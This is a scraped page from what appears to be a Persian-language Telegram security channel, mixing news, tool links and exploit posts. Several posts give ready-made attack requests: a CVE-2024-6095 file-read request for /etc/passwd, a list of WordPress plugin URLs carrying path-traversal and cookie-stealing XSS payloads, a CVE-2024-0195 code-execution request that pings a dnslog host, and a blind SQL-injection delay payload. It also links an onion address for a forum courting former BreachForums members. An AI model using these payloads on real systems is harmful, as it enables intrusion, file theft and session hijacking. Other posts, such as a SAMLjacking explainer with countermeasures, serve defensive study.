P.F.K Security
1.61K subscribers
128 photos
38 videos
37 files
404 links
APT / Exploit / Malware / ICS / OT / Vulnerability Analysis / SE
Download Telegram
CVE-2024-6095

POST /models/apply HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json

{"url":"file:///etc/passwd"}

#exploit #poc

@PfkSecurity
افزونه های وردپرس
____
simple-image-manipulator
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd

activehelper-livehelp
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

amministrazione-aperta
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd

anti-plagiarism
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

buddypress-component-stats
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd

dzs-videogallery
/wp-content/plugins/dzs-videogallery/admin/upload.php

e-search
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

fancy-product-designer
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php

hd-webplayer
/wp-content/plugins/hd-webplayer/playlist.php

localize-my-post
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd


@PfkSecurity
CVE-2024-0195 Exploit

POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B

#exploit #poc
@PfkSecurity
زمان مغز بزرگ

دانیل راین به عنوان مهندس زیرساخت اصلی برای یک شرکت ناشناس استخدام شد. او عمداً اعتبار کنترلر دامنه را تغییر داد تا از کارفرمایش 750000 دلار اخاذی کند.

او اکنون با 30 سال زندان مواجه است.

https://www.bleepingcomputer.com/news/security/employee-arrested-for-locking-windows-admins-out-of-254-servers-in-extortion-plot/

@PfkSecurity
🔺 امنیت تهاجمی باعث ایجاد امنیت دفاعی می شود 🔻
در اینجا مجموعه‌ای از تکنیک‌های حمله SaaS به اشتراک گذاشته شده تا به مدافعان کمک کند تا تهدیداتی را که با آن مواجه می‌شوند درک کنند

🟣 https://github.com/pushsecurity/saas-attacks

🔷 این پروژه مجموعه‌ای از تکنیک‌های حمله مختص به Software as a service (SaaS) را معرفی می‌کند و با استفاده از چارچوب‌ MITRE ATT&CK، به تحلیل تهدیدات امنیتی در محیط‌های SaaS میپردازد.


#Saas
#APT

@PfkSecurity
P.F.K Security
🔺 امنیت تهاجمی باعث ایجاد امنیت دفاعی می شود 🔻 در اینجا مجموعه‌ای از تکنیک‌های حمله SaaS به اشتراک گذاشته شده تا به مدافعان کمک کند تا تهدیداتی را که با آن مواجه می‌شوند درک کنند 🟣 https://github.com/pushsecurity/saas-attacks 🔷 این پروژه مجموعه‌ای از تکنیک‌های…
🔺 تکنیک SAMLjacking یکی از روش های حملات فیشینگ است که روی قابلیت SSO (Single Sign-On) که اغلب در پلتفرم‌های SaaS (نرم‌افزار به عنوان سرویس) استفاده می‌شود، تمرکز دارد
در این نوع حمله، مهاجمان از اعتماد کاربران به فرآیندهای SSO سوءاستفاده می‌کنند تا به‌طور غیرمجاز به سیستم‌های یک شرکت دسترسی پیدا کنند.

⭕️ مراحل حمله:

مهاجم ابتدا یک حساب کاربری جدید در یک پلتفرم SaaS ایجاد می‌کند. این پلتفرم‌ها معمولاً شامل ابزارهای مختلفی هستند که شرکت‌ها برای مدیریت فعالیت‌های خود استفاده می‌کنند
💢 مانند Miro، Office 365، یا سایر خدمات مشابه.

⭕️ تنظیمات اولیه:
پس از ثبت‌نام، مهاجم می‌تواند تنظیمات مختلف حساب را پیکربندی کند. یکی از این تنظیمات مهم، پیکربندی URL مربوط به SSO (احراز هویت یکپارچه) است.
💢 این آدرسی است که سرویس‌های SSO برای احراز هویت کاربران از آن استفاده می‌کنند. مهاجم می‌تواند این URL را طوری تنظیم کند که به یک سرور تحت کنترل خود اشاره کند و عملیات فیشینگ را کامل کند

📩 مهاجم می‌تواند دعوت‌نامه‌هایی برای پیوستن به این "حساب جدید شرکتی" ارسال کند. این دعوت‌نامه‌ها به کاربران جدید یا اعضای بالقوه شرکت ارسال می‌شود.
📮 دعوت‌نامه‌ها به‌طور معمول از دامنه‌ای به نظر می‌رسد که قانونی و معتبر است (از دامنه سرویس‌دهنده SaaS).
📌 اگر مهاجم در ابتدا از یک URL سرویسی که به نظر قانونی است استفاده کند و سپس URL SSO را به سرور خود تغییر دهد، کاربران ممکن است فکر کنند که URL SSO تغییر نکرده و بدون شک به ورود ادامه دهند.

⚠️ راهکارهای مقابله:
🔰آگاهی و آموزش: آموزش کارکنان، به‌ویژه کارکنان جدید، در مورد ریسک‌های حملات فیشینگ و چگونگی شناسایی دعوت‌نامه‌های مشکوک

🔰 پیکربندی SSO: اطمینان از اینکه پیکربندی‌های SSO به‌طور دقیق کنترل و نظارت می‌شوند. هر گونه تغییر در URL‌های SSO باید بازبینی و تأیید شود.
🔰 ابزارهای پیشگیری از فیشینگ: استفاده از ابزارهای پیشرفته پیشگیری از فیشینگ که می‌توانند ایمیل‌ها یا لینک‌های مخرب را قبل از رسیدن به کارکنان شناسایی و مسدود کنند.
🔰 ممیزی SSO: انجام ممیزی‌های منظم روی پیکربندی‌ها و لاگ‌های SSO برای شناسایی هرگونه تغییر غیرمجاز یا فعالیت مشکوک.

👁‍🗨 https://www.youtube.com/watch?v=4gAeSxbycXU
📚 https://pushsecurity.com/blog/samljacking-a-poisoned-tenant/

#Initial_Access
#APT
REMnux
یک جعبه ابزار لینوکس برای تحلیلگران بدافزار
https://remnux.org/
@PfkSecurity
Tricky ASP blind SQL Injection in a login page.
Payload👇
';%20waitfor%20delay%20'0:0:6'%20--%20
@pfksecurity
https://mail2torjgmxgexntbrmhvgluavhj7ouul5yar6ylbvjkxwqf6ixkwyd.onion

Mail2Tor

یک سرویس ایمیل ناشناس رایگان برای محافظت از حریم خصوصی شما است. وب سایت برای ثبت نام نیازی به اطلاعات اضافی ندارد، فقط به نام کاربری و رمز عبور نیاز دارد.

@PfkSecurity
این مخزن مجموعه ای از تمام شبیه سازی های APT است که بسیاری از بخش های حیاتی، اعم از خصوصی و دولتی را هدف قرار می دهد. این شبیه‌سازی شامل ابزارهای نوشتاری، سرورهای C2، بکدورها، تکنیک‌های بهره‌برداری، استیدرها، بوت‌لودرها و بسیاری از ابزارهای دیگر است که مهاجمان ممکن است در حملات واقعی استفاده کرده باشند. این ابزارها و TTP ها در اینجا شبیه سازی شده اند.

https://github.com/S3N4T0R-0X0/APT-Attack-Simulation

#exploit #APT
@PfkSecurity
Media is too big
VIEW IN TELEGRAM
Mac Malware Minutes - arm64 Launch Arguments
#Malware
@PfkSecurity
⚠️تلگرام⚠️Astounding از SecretForums اعلام کرده است که به اعضای سابق BreachForums رتبه ای مشابه با آنچه در سایت داشتند می دهد.

secretsmt222qvdg6rcmgvx4dqqc2673yzyxjrrnabwklnn6qddyv5ad.onion

@PfkSecurity
💡MyIP💡
"بررسی آسان IP های شما، موقعیت جغرافیایی IP، بررسی نشت DNS، بررسی اتصالات WebRTC، تست سرعت، تست پینگ، تست MTR، بررسی در دسترس بودن وب سایت، جستجوی whois و موارد دیگر!"
GitHub: https://github.com/jason5ng32/MyIP

@PfkSecurity